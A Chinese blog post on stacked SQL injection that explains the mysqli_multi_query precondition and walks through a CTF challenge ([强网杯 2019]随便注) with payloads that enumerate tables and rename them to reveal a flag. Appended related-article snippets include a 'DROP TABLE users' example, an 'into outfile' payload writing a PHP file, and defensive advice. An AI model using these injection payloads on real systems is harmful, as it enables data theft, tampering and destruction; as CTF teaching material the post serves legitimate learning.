sql-堆叠注入

最新推荐文章于 2025-04-18 10:52:55 发布
最新推荐文章于 2025-04-18 10:52:55 发布
阅读量622 收藏 5
点赞数 1
文章标签: sql 数据库 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/zhhhb1005/article/details/126310488
版权

前几星期写题时遇见了好几道关于堆叠注入的题目,结果发现我对堆叠注入不是特别了解,所以写一下博客记录一下,但是发现堆叠注入使用的场景和条件好像有点苛刻。

目录

堆叠注入原理

堆叠注入触发条件

实例

[强网杯 2019]随便注

堆叠注入原理

堆叠注入,顾名思义,就是将语句堆叠在一起进行查询
原理很简单,mysql_multi_query() 支持多条sql语句同时执行,就是个;分隔,成堆的执行sql语句,例如

 select * from users;show databases;

就同时执行以上两条命令,所以我们可以增删改查,只要权限够。
虽然这个注入姿势很牛逼,但实际遇到很少,其可能受到API或者数据库引擎,又或者权限的限制只有当调用数据库函数支持执行多条sql语句时才能够使用,利用mysqli_multi_query()函数就支持多条sql语句同时执行,但实际情况中,如PHP为了防止sql注入机制,往往使用调用数据库的函数是mysqli_ query()函数,其只能执行一条语句,分号后面的内容将不会被执行,所以可以说堆叠注入的使用条件十分有限,一旦能够被使用,将可能对网站造成十分大的威胁。

堆叠注入触发条件

堆叠注入触发的条件很苛刻,因为堆叠注入原理就是通过结束符同时执行多条sql语句,这就需要服务器在访问数据端时使用的是可同时执行多条sql语句的方法,例如php中的mysqli_multi_query函数。但与之相对应的mysqli_query()函数一次只能执行一条sql语句,所以要想目标存在堆叠注入,在目标主机没有对堆叠注入进行黑名单过滤的情况下必须存在类似于mysqli_multi_query()这样的函数,简单总结下来就是

1、目标存在sql注入漏洞
2、目标未对";"号进行过滤
3、目标中间层查询数据库信息时可同时执行多条sql语句

实例

[强网杯 2019]随便注

输入1,页面返回正常;
输入1’ 页面报错了,加上注释符号#页面又回显正常,那么闭合符号就是单引号

然后进行正常的操作。

判断列数:

1' order by 2#   //回显正常
1' order by 3#   //回显报错

 

 联合查询:

1' union select 1,2#

发现过滤了很多函数。

尝试堆叠注入:

1'; show databases;#

 

查表名:

1'; show tables;#

 

查询这两个表名中的列:

注意:这里查询表名使用反单引号,在windows系统下,反单引号(`)是数据库、表、索引、列和别名用的引用符。

-1'; show columns from 'words';#
-1'; show columns from `1919810931114514`;#

 在表1919810931114514中发现flag

 虽然我们已经找到了flag了,但是select被过滤了,而show命令又不能查看值。这就比较头疼了,不过如果仔细观察的话,一开始过滤的并没有alert 和 rename,我们已经知道了words是用来回显内容的,所以思路就是:我们把1919810931114514这个表更改名字为words,并增加相应的字段,使之回显原1919810931114514这个表的内容里面。

  1. 将words的表名改成其它名字
  2. 将1919810931114514表名改成"words"
  3. 将flag列名改成id或者data
  4. 在将这个新的words表插入一个列,即id或者data

这里就要考验到我们对sql数据库的增删查改的能力了,当然我也不会,所以去网上搜一下。 

rename: 修改名字
使用方法:rename table(修改的类型) tableA(待修改的表等) to tableB(重命名后的名字)
alter:队列进行操作
使用方法:alter table table[表名] add column[列名] type[数据类型] //(添加列)
		alter table table[表名] change columnA[原列名] column[修改后列名] type[数据类型] //改变列名1
		alter table table[表名] rename columnA[原列名] column[修改后列名]  //改变列名2,(不改变数据类型)
		alter table table[表名] alter column column[列名] type[修改后的数据类型] //修改列的数据类型
		alter table table[表名] drop column[列名] type[数据类型]  //删除表中的某一列
		SQL限制条件:
        alter table table[表名] modify column[列名] int not null  //是某一列不能存储null的字段
        alter table table[表名] modify column[列名] int null     //解除对not null的限制
        alter table table[表名] add column[列名] primary key (id) 
        //- NOT NULL 和 UNIQUE 的结合。指定主键,确保某列(或多个列的结合)有唯一标识,每个表有且只有一个主键。
        alter table table[表名] add unique (id);
        //增加unique约束。保证某列的每行必须有唯一的值。(注:可以有多个 UNIQUE 约束,只能有一个 PRIMARY KEY 约束)
        alter table table[表名] add check (限制条件); //限制列的值得范围
        alter table table[表名] alter column[列名] set default '默认值' //设置默认值,即未给列赋值时的默认值
		alter table table[表名] add constraint ab_c default '默认值' for column[列名] //
		alter table table[表名] add column[列名] auto_increment    //自动赋值,默认从1开始
		alter table table[表名] add column[列名] foreign key //保证一个表中的数据匹配另一个表中的值的参照完整性

构造出payload如下:

1';RENAME TABLE `words` TO `words1`;RENAME TABLE `1919810931114514` TO `words`;ALTER TABLE `words` CHANGE `flag` `id` VARCHAR(100) ;show columns from words;#
  • rename table words to word1; //将words表名更改为word1
  • rename table1919810931114514to words;//将1919810931114514表名改为words
  • alter table words change flag id varchar(100); //将words表中的flag列改成数据类型为char(100)名字为data的新列

 

 

S@Kura
关注
26-2 SQL注入攻击 - 堆叠注入(Stacked Injection)
weixin_43263566的博客
03-10 743
堆叠注入(Stacked Injection)是指一次性执行多条 SQL 语句的注入技术。在实际应用中,堆叠注入通常指在MySQL数据库中,通过在命令行中以分号(;)分隔每条语句来实现同时执行多条语句的注入攻击。因此,堆叠注入即为一堆(多条)SQL语句一起执行的注入攻击方式。
sql注入过滤select_SQL注入高级进阶-堆叠注入
weixin_39808803的博客
11-21 1457
原理0x00 堆叠注入定义 Stacked injections(堆叠注入)从名词的含义就可以看到应该是一堆 sql 语句(多条)一起执行。而在真实的运用中也是这样的, 我们知道在 mysql 中, 主要是命令行中, 每一条语句结尾加; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做 stacked injection。0x01 堆叠注入原理 在SQL中,分号(;)是用来表示一条s...
SQL注入——堆叠注入
Zhujiangcheng的博客
06-08 1029
SQL注入简介——堆叠注入(一)SQL注入的概述和分类1.概述2.分类①按照数据提交的方式来分类:②按照执行效果来分类:③按照注入点类型来分类:(二)堆叠注入1.概念2.局限 (一)SQL注入的概述和分类 1.概述   首先说,什么是SQL注入?   程序员在开发用户和数据库交互的系统时没有对用户输入的字符串进行过滤、转义、限制,或者处理不严谨,导致用户可以通过输入精心构造的字符串去非法获取到数据库中的数据,这一构造字符串非法获取数据的过程就被称为SQL注入。 2.分类 (参考来源: link.) ①按照数
sql注入堆叠注入
m0_68976043的博客
02-23 2371
堆叠注入产生原因是因为mysql_multi_query()支持多行查询,如果没有这个函数我们使用不了堆叠注入,其次堆叠注入通过分号分隔。
sql注入9之堆叠注入
最新发布
jonhswei的博客
04-18 1099
堆叠注入SQL 注入攻击的一种形式,攻击者通过注入多个 SQL 语句来执行多个操作。通过分号。
SQL注入-堆叠注入
m0_53820621的博客
08-15 1528
数据库支持堆叠查询,所谓堆叠查询就是执行多条语句,语句以;隔开。并且代码使用了支持堆叠查询的函数,列如PHP的。堆叠注入就是在第二条语句中构造payload,注:页面只返回第一条语句,不返回第二条语句。堆叠注入后果很严重,可以直接对数据库增删改。...
sql注入 - 堆叠注入
wcy19990628的博客
02-10 368
5、堆叠(多语句)注入 http://localhost/sqli-labs-master/Less-38/?id=-1'; select "<?php phpinfo();?>" into outfile "D:\\phpStudy\\PHPTutorial\\WWW\\aaaaaaaaqq.php" ;-- 在php连接mysql注入中用到了musqli_multi_query...
SQL注入-07】堆叠注入案例—以sqli-labs-less38为例
m0_64378913的博客
05-05 1086
目录1 堆叠注入概述1.1 定义1.2 与union联合查询注入的对比1.3 局限性2 堆叠注入案例—以sqli-labs-less38为例2.1 实验平台2.2 实验目标2.3 堆叠注入实验步骤2.3.1 注入前准备2.3.2 判断注入点及注入类型2.3.3 判断回显列数及回显位置2.3.4 union注入获取库名表名字段名2.3.5 堆叠注入3 总结参考文章 1 堆叠注入概述 1.1 定义 英文为 stacked injection。 在SQL数据库中,每条语句是以;分开的,堆叠注入就是一次性注入并执
【合天网安】SQLi-Labs系列之堆叠注入
hehigoxqc606的博客
09-02 405
概念: Stacked injections:堆叠注入。从名词的含义就可以看到应该是一堆SQL语句(多条)一起执行。而在真实的运用中也是这样的,在mysql中,主要是命令行中,每一条语句结尾加分号;来表示语句结束。 堆叠注入使用条件 堆叠注入的使用条件十分有限,其可能受到API或者数据库引擎,又或者权限的限制只有当调用数据库函数支持执行多条sql语句时才能够使用,利用mysql_multi_query()函数,其只能执行一条语句,分号后面的内容将不会被执行。 任务一:基于GET型的堆叠注..
Stached injection -- 堆叠注入
RuoLi_s的博客
12-30 297
Stached injection – 堆叠注入 原文链接请点击:https://www.cnblogs.com/ruoli-s/p/14208908.html 0x00 堆叠注入的定义 ​ Stacked injection 汉语翻译过来后,称 为堆查询注入,也有称之为堆叠注入堆叠注入为攻击者提供了很多的攻击手段,通过添加一个新的查询或者终止查询,可以达到修改数据和调用存储过程的目的。 0x01 堆叠注入的原理 ​ 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql
SQL注入堆叠注入
07-15 1076
SQL-堆叠注入
SQL注入--堆叠注入
qq_37107430的博客
12-10 786
堆叠注入概念:在 SQL 中, 分号(;) 是用来表示一条 sql 语句的结束。 试想一下我们在 ; 结束一个 sql语句后继续构造下一条语句, 会不会一起执行? 因此这个想法也就造就了堆叠注入
sql注入知识---堆叠注入
尘玥的故事
04-11 1992
堆叠注入的使用条件十分有限,其可能受到API或者数据库引擎,又或者权限的限制只有当调用数据库函数支持执行多条sql语句时才能够使用,利用mysqli_multi_query()函数就支持多条sql语句同时执行,但实际情况中,如PHP为了防止sql注入机制,往往使用调用数据库的函数是mysqli_ query()函数,其只能执行一条语句,分号后面的内容将不会被执行,所以可以说堆叠注入的使用条件十分有限,一旦能够被使用,将可能对网站造成十分大的威胁。根据数据库类型决定是否支持多条语句执行(核心)
SQL注入- 堆叠注入
m0_52149675的博客
04-05 3138
​stacked injections(堆叠注入)从名词的含义就可以看到应该是一堆sql语句(多条)一起执行。而在真实的运用中也是这样的,我们知道在mysql 中,主要是命令行中,每一条语句结尾加;表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做stacked injection。
SQL注入堆叠注入
2201_75572825的博客
08-02 380
平常我们注入时都是通过对原来SQL语句传输数据的地方进行相关修改,注入情况会因为该语句本身的情况而受到相关限制,例如一个select语句,那么我们注入时也只能执行select操作,无法进行增、删、改,其他语句也同理,所以可以说我们能够注入的十分有限。但堆叠注入则完全打破了这种限制,其名字顾名思义,就是可以堆一堆sql注入进行注入,这个时候我们就不受前面语句的限制可以为所欲为了。
Sqli-labs Less38-45 堆叠注入
kevinhanser
08-10 759
本文记录 SQL 注入的学习过程,资料为 SQLi SQLi 博客目录 Less - 38: GET- Stacked Query Injection - String 源代码 $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; 测试 http://10.10.10.137/sqli-labs/Less-38/?id=...
sql堆叠注入
03-08
### SQL 堆叠注入概述 SQL堆叠注入是一种攻击方式,其中攻击者通过在同一查询字符串中附加额外的有效SQL语句来执行未授权的操作。这种技术利用了某些数据库管理系统允许在一个输入字段内执行多个语句的能力[^1]。 #### 原理 当应用程序未能正确验证用户输入并将其直接拼接到SQL命令时,就可能发生这种情况。如果存在漏洞,则可以构造特殊的输入,在原始预期操作之后插入分号`;`和其他恶意指令。例如: ```sql SELECT * FROM users WHERE id = '1'; DROP TABLE users; -- ``` 上述例子展示了如何在合法请求后面追加破坏性的删除表动作;最后两个连字符表示注释符号,用于忽略任何后续由程序自动生成的内容。 #### 方法 为了成功实施此类攻击,通常需要满足几个条件- 数据库配置允许多条语句一起提交; - 应用层面对最终形成的SQL文本缺乏严格过滤机制; - 攻击面暴露于可被操控的数据入口处,比如URL参数、HTTP POST体内的form fields等位置。 #### 防御措施 防止SQL堆叠注入的关键在于遵循安全编码实践以及采用多层防护策略: - **预编译语句**:使用参数化查询代替动态构建的SQL串,这样即使有危险字符传入也不会改变原有逻辑结构。 ```java PreparedStatement pstmt = connection.prepareStatement("INSERT INTO table (column) VALUES (?)"); pstmt.setString(1, userInput); ``` - **最小权限原则**:确保运行Web应用的服务账户只拥有完成其职责所需的最低限度访问权,从而减少潜在危害范围。 - **输入验证与清理**:对所有外部数据源进行全面检查,去除非法成分的同时保留有效部分。 - **启用WAF(Web Application Firewall)**:部署专门针对已知模式匹配的安全设备或服务端插件,实时拦截可疑流量。 - **定期审计代码质量**:保持良好的开发习惯,及时发现并修复可能存在的安全隐患[^2].
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值